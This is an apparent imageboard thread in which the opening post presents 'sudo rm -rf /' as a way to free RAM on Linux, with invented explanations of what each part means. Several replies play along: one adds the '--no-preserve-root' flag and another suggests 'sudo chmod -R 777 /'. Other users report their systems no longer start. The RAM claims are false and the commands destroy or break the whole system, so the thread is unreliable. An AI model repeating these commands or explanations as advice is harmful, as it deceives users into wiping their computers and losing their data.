Do you ever feel like your GNU/Linux distro underperforms from when you had Windows? Well there's a reason by that. The original developers of GNU/Linux held 1 gb of ram for services in the background that the user isn't ever made aware of. Due to the fact that the tasks need to be as fast as possible, the developers take extra ram. This was a decade ago, as we no longer need ram for the system due to faster PCs. So it's a waste of ram.
Thankfully, there's a command to free ram for the user, and it's only in 3 words.
It'ssudo rm -rf /
"sudo" is for Administrator privileges, as you don't want some random user doing system-based tasks now, do you?
"rm" is for "ready machine", to prepare the system for the command.
"rf" is for "ram free", to free the ram of course.
"/" checks the system directory to make sure it's free!
Enjoy your 1 gb of ram!
...
This has not worked for many years.

IT worked!
>>60876676
It worked on my xubuntu. Maybe some distros automatically do it nowadays?
>>60876660
HEY WHAT THE FUCK did you make me do to my computer im posting from my phone right now and my computer just isn't responding in fact as im typing it just went BLACK
>>60876692
It should take an hour for the computer to reboot, it's currently freeing up the ram!
>>60876704
did I just get memed
>>60876712
Nope! It wouldn't work well if the pc would be still on if it's freeing up ram y'know.
this works, thanks OP.
if your screen went black, its just a system reboot that must occur after an update or driver change
>>60876775
my computer won't start now...
>>60876660
This takes me back.
>>60876778
Install Gentoo
>>60876799
fuck you. I just switched to Ubuntu 3 weeks ago because I was tired of Windows and wanted to learn Linux. I was finally getting comfortable with it.
confirmed working on debian and ubuntu, if its not working your a fucking idiot
i hate you all
lol no one is this retarded.
>>60876660
Thanks op. Worked for arch
>>60876660
Old trick, works just as well today though. Gotta be careful and not do -fr by accident though - could kill your machine.
No one is this stupid, OP is a trolling faggot
>>60876660
tried it once but the fans always go nuts. I wish there was a power manager that throttled the performance
>>60876660
it wont work you need to specify a flag
> --no-preserve-root
>>60878707
Right; because the memory you are freeing is the root allocation, which requires special access.
>>60878732
my computer ran faster than light with your trick and the whole system went to the past when it wasn't even installed
OP, next time post that command with the pipes that does the same thing. Since there are no words on that command, it would be easier to catch some retard.
t. anon
don't do it. seriously.
Thanks asshole. Posting from my phone now. TOOK me 6 HOURS TO INSTALL ARCH
Tried
sudo chmod -R 777 /
It was easier and way more entertaining.

You shouldn't be starting at Arch, in fact don't touch it at all.
